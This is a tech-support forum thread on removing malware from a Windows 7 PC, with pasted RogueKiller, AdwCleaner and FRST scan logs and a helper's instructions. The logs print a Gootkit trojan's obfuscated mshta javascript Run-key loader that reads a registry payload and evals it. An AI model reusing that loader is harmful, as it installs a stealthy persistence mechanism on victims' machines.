Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZNBMNG57 (Temporary Internet Files Folder)



Registry: 2

Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)




~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 05/03/2016 at  6:24:40.20
End of JRT log

 

 

RogueKiller V12.1.5.0 [May  2 2016] (Free) by Adlice Software
mail : http://www.adlice.com/contact/
Feedback : http://forum.adlice.com
Website : http://www.adlice.com/software/roguekiller/
Blog : http://www.adlice.com

Operating System : Windows 7 (6.1.7601 Service Pack 1) 64 bits version
Started in : Normal mode
User : kathy [Administrator]
Started from : C:\Users\kathy\Desktop\RogueKiller.exe
Mode : Scan – Date : 05/03/2016 06:47:49

¤¤¤ Processes : 0 ¤¤¤

¤¤¤ Registry : 5 ¤¤¤
[Suspicious.Path|VT.Unknown] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | eb72c195 : "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" [-] -> Found
[Tr.Gootkit] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
[Tr.Gootkit] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Run | 2f892c0f : mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; [x][x] -> Found
[PUM.StartMenu] (X64) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found
[PUM.StartMenu] (X86) HKEY_USERS\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced | Start_TrackProgs : 0  -> Found

¤¤¤ Tasks : 0 ¤¤¤

¤¤¤ Files : 0 ¤¤¤

¤¤¤ Hosts File : 0 ¤¤¤

¤¤¤ Antirootkit : 0 (Driver: Not loaded [0xc000036b]) ¤¤¤

¤¤¤ Web browsers : 1 ¤¤¤
[PUM.HomePage][FIREFX:Config] 21kim9lc.default-1455458506894 : user_pref("browser.startup.homepage", "http://www.wmcactionnews5.com/");-> Found

¤¤¤ MBR Check : ¤¤¤
+++++ PhysicalDrive0: Hitachi HDS721010CLA332 ATA Device +++++
— User —
[MBR] 09ca43984b597e471acdcb4c96baadfe
[BSP] 65ab201fc7625de52b04b51f28d7e468 : Windows Vista/7/8|VT.Unknown MBR Code
Partition table:
0 - [ACTIVE] NTFS (0x7) [VISIBLE] Offset (sectors): 2048 | Size: 100 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
1 - [XXXXXX] NTFS (0x7) [VISIBLE] Offset (sectors): 206848 | Size: 953767 MB [Windows Vista/7/8 Bootstrap | Windows Vista/7/8 Bootloader]
User = LL1 … OK
User = LL2 … OK

    Please let me know if I need to redo the other..:(

Thanks  here it is

 

 

 

 

# AdwCleaner v5.115 - Logfile created 03/05/2016 at 05:57:22
# Updated 01/05/2016 by Xplode
# Database : 2016-05-01.2 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (X64)
# Username : kathy - KATHY-PC
# Running from : C:\Users\kathy\Desktop\adwcleaner_5.115.exe
# Option : Scan
# Support : http://toolslib.net/forum

***** [ Services ] *****

Service Found : scan

***** [ Folders ] *****

Folder Found : C:\ProgramData\SparkTrust
Folder Found : C:\ProgramData\TweakBit
Folder Found : C:\ProgramData\Application Data\SparkTrust
Folder Found : C:\ProgramData\Application Data\TweakBit
Folder Found : C:\Program Files (x86)\SparkTrust
Folder Found : C:\Program Files (x86)\TweakBit
Folder Found : C:\Program Files (x86)\Common Files\SparkTrust
Folder Found : C:\Users\kathy\AppData\Roaming\SparkTrust
Folder Found : C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\SparkTrust

***** [ Files ] *****

File Found : C:\Users\kathy\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\SparkTrust PC Cleaner Plus.lnk

***** [ DLL ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****

Task Found : SparkTrust Registration3

***** [ Registry ] *****

Key Found : HKCU\Software\Classes\Applications\updater.exe
Key Found : HKLM\SOFTWARE\Classes\uus3url-st
Key Found : HKLM\SOFTWARE\Classes\Interface\{65416821-217D-44BD-9C61-F53398FB1B46}
Key Found : HKLM\SOFTWARE\Classes\Interface\{4ABDD67C-44E3-42E0-816D-D7F0E54761DF}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{34F4FEAF-4921-4B5D-8BE5-CA384BFFC2CE}
Key Found : HKLM\SOFTWARE\Classes\TypeLib\{39A37965-0A96-43A3-870E-821FE5C84B0B}
Key Found : HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Stats\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
Key Found : HKCU\Software\APN PIP
Key Found : HKCU\Software\SparkTrust\SparkTrust PC Cleaner Plus
Key Found : HKCU\Software\SparkTrust\UNS\SparkTrust PC Cleaner Plus
Key Found : HKLM\SOFTWARE\SparkTrust\SparkTrust PC Cleaner Plus
Key Found : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{35827710-D042-428B-A1E5-E20E12D2FEB9}
Key Found : [x64] HKLM\SOFTWARE\Essentware
Key Found : HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\APN PIP
Key Found : HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\SparkTrust\SparkTrust PC Cleaner Plus
Key Found : HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\SparkTrust\UNS\SparkTrust PC Cleaner Plus
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\ask.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\businessnewsinbox.com
Key Found : HKCU\Software\Microsoft\Internet Explorer\DOMStorage\testinetspeed.dl.tb.ask.com
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Shared Tools\MsConfig\StartupReg\ApnTBMon
Key Found : [x64] HKLM\SOFTWARE\Microsoft\Shared Tools\MsConfig\StartupReg\mobilegeni daemon

***** [ Web browsers ] *****

[C:\Users\kathy\AppData\Roaming\Mozilla\Firefox\Profiles\21kim9lc.default-1455458506894\prefs.js] Found : user_pref("media.gmp-eme-adobe.lastUpdate", 1462234502);
[C:\Users\kathy\AppData\Roaming\Mozilla\Firefox\Profiles\21kim9lc.default-1455458506894\prefs.js] Found : user_pref("media.gmp-manager.lastCheck", 1462234500);
[C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : aol.com
[C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Found : ask.com

*************************

C:\AdwCleaner\AdwCleaner[S1].txt - [3538 bytes] - [03/05/2016 05:57:22]

########## EOF - C:\AdwCleaner\AdwCleaner[S1].txt - [3611 bytes] ##########
 

Thanks but it appears that you didn't "Clean" what was found.

  • run AdwCleaner again by clicking on Scan
  • when it has finished, leave everything that was found checked, (ticked), then click on Clean
  • if it asks to reboot, allow the reboot
  • on reboot a log will be produced; please attach the content of the log to your next reply.

Satchfan

I ran the scan again, it showed no infections.   i still clicked on clean and here is the result.# AdwCleaner v5.115 - Logfile created 03/05/2016 at 14:21:14
# Updated 01/05/2016 by Xplode
# Database : 2016-05-01.2 [Server]
# Operating system : Windows 7 Home Premium Service Pack 1 (X64)
# Username : kathy - KATHY-PC
# Running from : C:\Users\kathy\Desktop\bad stuff programs\adwcleaner_5.115.exe
# Option : Clean
# Support : http://toolslib.net/forum

***** [ Services ] *****


***** [ Folders ] *****


***** [ Files ] *****


***** [ DLLs ] *****


***** [ WMI ] *****


***** [ Shortcuts ] *****


***** [ Scheduled tasks ] *****


***** [ Registry ] *****


***** [ Web browsers ] *****


*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C1].txt - [3980 bytes] - [03/05/2016 06:14:32]
C:\AdwCleaner\AdwCleaner[C2].txt - [825 bytes] - [03/05/2016 14:21:14]
C:\AdwCleaner\AdwCleaner[S1].txt - [3702 bytes] - [03/05/2016 05:57:22]
C:\AdwCleaner\AdwCleaner[S2].txt - [3775 bytes] - [03/05/2016 05:59:10]
C:\AdwCleaner\AdwCleaner[S3].txt - [3848 bytes] - [03/05/2016 06:02:43]
C:\AdwCleaner\AdwCleaner[S4].txt - [3921 bytes] - [03/05/2016 06:06:56]
C:\AdwCleaner\AdwCleaner[S5].txt - [1180 bytes] - [03/05/2016 14:20:06]

########## EOF - C:\AdwCleaner\AdwCleaner[C2].txt - [1262 bytes] ##########
 

Quite a bit has been cleared but I need to see the current situation.

Please run Rogue Killer again and send the new log.

Also run FRST again and send that log also.

Thanks

Satchfan

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:03-05-2016
Ran by [removed] (administrator) on KATHY-PC (03-05-2016 19:29:00)
Running from C:\Users\[removed]\Desktop
[removed] Platform: Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(AMD) C:\Windows\System32\atiesrxx.exe
(AMD) C:\Windows\System32\atieclxx.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
(Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
(Digital Care Solutions) C:\Program Files\BDServices\BitDefenderCOM.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe
(RealNetworks, Inc.) C:\Program Files (x86)\Real\RealPlayer\RPDS\Bin\rpdsvc.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe
() C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe
(Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe
(Microsoft Corporation) C:\Program Files\Windows Sidebar\sidebar.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\psi_tray.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\psia.exe
(Microsoft Corporation) C:\Windows\System32\GWX\GWX.exe
(AVAST Software) C:\Program Files\AVAST Software\Avast\AvastUI.exe
(Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
(Secunia) C:\Program Files (x86)\Secunia\PSI\sua.exe
(Apple Inc.) C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
() C:\Program Files (x86)\RealNetworks\RealDownloader\downloader2.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\…\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [176952 2016-03-19] (Apple Inc.)
HKLM-x32\…\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [7391632 2016-05-03] (AVAST Software)
Winlogon\Notify\LBTWlgn: c:\program files\common files\logishrd\bluetooth\LBTWlgn.dll (Logitech, Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [iCloudServices] => C:\Program Files (x86)\Common Files\Apple\Internet Services\iCloudServices.exe [60688 2015-11-30] (Apple Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [ApplePhotoStreams] => C:\Program Files (x86)\Common Files\Apple\Internet Services\ApplePhotoStreams.exe [61200 2015-11-30] (Apple Inc.)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**eb72c195<*>] => "C:\Users\kathy\AppData\Local\fb05b4\0b8081.lnk" <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\…\Run: [**2f892c0f<*>] => mshta javascript:HmndQX1LU="zYf";lj4=new%20ActiveXObject("WScript.Shell");OlJv4wdo="SPkO";FF7Dq=lj4.RegRead("HKCU\\software\\4894f2649e\\60cda022");qH0DvILKM="DW9";eval(FF7Dq);Fvfo6zh0pK="w5P"; <===== ATTENTION (Value Name with invalid characters)
ShellIconOverlayIdentifiers: [  GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [  GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-04-25] (Google)
ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2016-05-03] (AVAST Software)
ShellIconOverlayIdentifiers: [GDriveSharedOverlay] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D44} =>  No File
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
ShellIconOverlayIdentifiers-x32: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\Secunia PSI Tray.lnk [2015-09-03]
ShortcutTarget: Secunia PSI Tray.lnk -> C:\Program Files (x86)\Secunia\PSI\psi_tray.exe (Secunia)
Startup: C:\Users\kathy\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\beeba6.lnk [2016-04-26]
ShortcutTarget: beeba6.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 75.75.75.75 75.75.76.76
Tcpip\..\Interfaces\{90737AD7-EC0F-4A9A-9240-05C790471720}: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{DDED8800-07B5-43B7-A17D-6F223175D62E}: [DhcpNameServer] 75.75.75.75 75.75.76.76

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = www.google.com
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://www.google.com/?trackid=sp-006
HKU\S-1-5-21-3123285271-2719112281-3259339859-1000\Software\Microsoft\Internet Explorer\Main,Search Bar = hxxps://www.google.com/?trackid=sp-006
SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKLM-x32 -> {21A51130-7285-49FE-B3F6-2385CC71CDEA} URL = hxxp://www.bing.com/search?q={searchTerms}&form;=MNMTDF&pc;=MANM&src;=IE-SearchBox
SearchScopes: HKLM-x32 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> DefaultScope {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
SearchScopes: HKU\S-1-5-21-3123285271-2719112281-3259339859-1000 -> {E9410C70-B6AE-41FF-AB71-32F4B279EA5F} URL = hxxps://www.google.com/search?trackid=sp-006&q;={searchTerms}
BHO: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin64.dll [2014-10-27] (RealDownloader)
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-03-18] (Microsoft Corporation)
BHO: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE64.dll [2016-05-03] (AVAST Software)
BHO: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\URLREDIR.DLL [2016-03-18] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: RealNetworks Download and Record Plugin for Internet Explorer -> {3049C3E9-B461-4BC5-8870-4C09146192CA} -> C:\Program Files (x86)\RealNetworks\RealDownloader\BrowserPlugins\IE\rndlbrowserrecordplugin.dll [2014-10-27] (RealDownloader)
BHO-x32: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\Office15\OCHelper.dll [2016-03-18] (Microsoft Corporation)
BHO-x32: avast! Online Security -> {8E5E2654-AD2D-48bf-AC2D-D17F00898D06} -> C:\Program Files\AVAST Software\Avast\aswWebRepIE.dll [2016-05-03] (AVAST Software)
BHO-x32: Windows Live Sign-in Helper -> {9030D464-4C02-4ABF-8ECC-5164760863C6} -> C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll [2009-01-22] (Microsoft Corporation)
BHO-x32: Logitech SetPoint -> {AF949550-9094-4807-95EC-D1C317803333} -> C:\Program Files\Logitech\SetPointP\32-bit\SetPointSmooth.dll [2014-05-19] (Logitech, Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office 15\root\Office15\URLREDIR.DLL [2016-03-18] (Microsoft Corporation)
BHO-x32: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\Office15\GROOVEEX.DLL [2016-04-19] (Microsoft Corporation)
BHO-x32: No Name -> {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} -> No File
DPF: HKLM {7530BFB8-7293-4D34-9923-61A11451AFC5} hxxp://download.eset.com/special/eos/OnlineScanner.cab
DPF: HKLM-x32 {FFB3A759-98B1-446F-BDA9-909C6EB18CC7} hxxp://utilities.pcpitstop.com/da2/PCPitStop2.cab
Handler-x32: livecall - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: msnim - {828030A1-22C1-4009-854F-8E305202313F} - C:\Program Files (x86)\Windows Live\Messenger\msgrapp.14.0.8117.0416.dll [2010-04-17] (Microsoft Corporation)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-02-03] (Microsoft Corporation)

FireFox:
========
FF ProfilePath: C:\Users\kathy\AppData\Roaming\Mozilla\Firefox\Profiles\21kim9lc.default-1455458506894
FF DefaultSearchEngine.US: Google
FF Homepage: hxxp://www.wmcactionnews5.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-04-07] ()
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-04-07] ()
FF Plugin-x32: @Apple.com/iTunes,version=1.0 -> C:\Program Files (x86)\iTunes\Mozilla Plugins\npitunes.dll [2016-03-08] ()
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/Lync,version=15.0 -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX86\Mozilla Firefox\plugins\npmeetingjoinpluginoc.dll [2015-11-03] (Microsoft Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-12] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2014-02-20] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation)
FF Plugin-x32: @Motive.com/NpMotive,version=1.0 -> C:\Program Files (x86)\ATT\8.3.1.18\ma\bin\npMotive.dll [No File]
FF Plugin-x32: @pandonetworks.com/PandoWebPlugin -> C:\Program Files (x86)\Pando Networks\Media Booster\npPandoWebPlugin.dll [No File]
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-18] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-27] (RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-18] (RealPlayer Cloud)
FF Plugin-x32: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\ProgramData\Visan\plugins\npRLSecurePluginLayer.dll [2013-02-14] (RocketLife, LLP)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppdf32.dll [2015-12-18] (Adobe Systems Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nppl3260.dll [2015-02-18] (RealNetworks, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\nprpplugin.dll [2015-02-18] (RealPlayer Cloud)
FF Extension: Motive Extension - C:\Program Files (x86)\Mozilla Firefox\extensions\[removed] [2013-03-14] [not signed]
FF HKLM\…\Firefox\Extensions: [[removed]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF Extension: Avast Online Security - C:\Program Files\AVAST Software\Avast\WebRep\FF [2016-05-03]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files\AVAST Software\Avast\WebRep\FF
FF HKLM-x32\…\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: RealDownloader - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2015-02-18] [not signed]
FF HKLM-x32\…\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKLM-x32\…\Firefox\Extensions: [{F003DA68-8256-4b37-A6C4-350FA04494DF}] - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt
FF Extension: Logitech SetPoint - C:\Program Files\Logitech\SetPointP\LogiSmoothFirefoxExt [2015-04-03] [not signed]
FF HKLM-x32\…\Firefox\Extensions: [[removed]] - C:\Program Files\AVAST Software\Avast\SafePrice\FF
FF Extension: Avast SafePrice - C:\Program Files\AVAST Software\Avast\SafePrice\FF [2016-05-03]

Chrome:
=======
CHR StartupUrls: Default -> "hxxps://www.facebook.com/?ref=tn_tnmn"
CHR DefaultSearchURL: Default -> hxxp://newtab.co/?q={searchTerms}
CHR DefaultSearchKeyword: Default -> NewTabCo
CHR DefaultSuggestURL: Default -> hxxp://newtab.co/suggest.php?q={searchTerms}
CHR Profile: C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Avast Online Security) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\gomekmidlodglbbmalcneegieacbdmki [2016-05-02]
CHR Extension: (NewTab.co) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\hehmagdhjdamhcodiolgpgpmjbcogokj [2016-05-02]
CHR Extension: (Google Wallet) - C:\Users\kathy\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-04-02]
CHR HKLM-x32\…\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx [2016-05-03]

==================== Services (Whitelisted) ========================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 Apple Mobile Device Service; C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe [83768 2016-03-02] (Apple Inc.)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [243296 2016-05-03] (AVAST Software)
R2 BitDefenderCOM; C:\Program Files\BDServices\BitDefenderCom.exe [1075712 2016-03-05] (Digital Care Solutions) [File not signed]
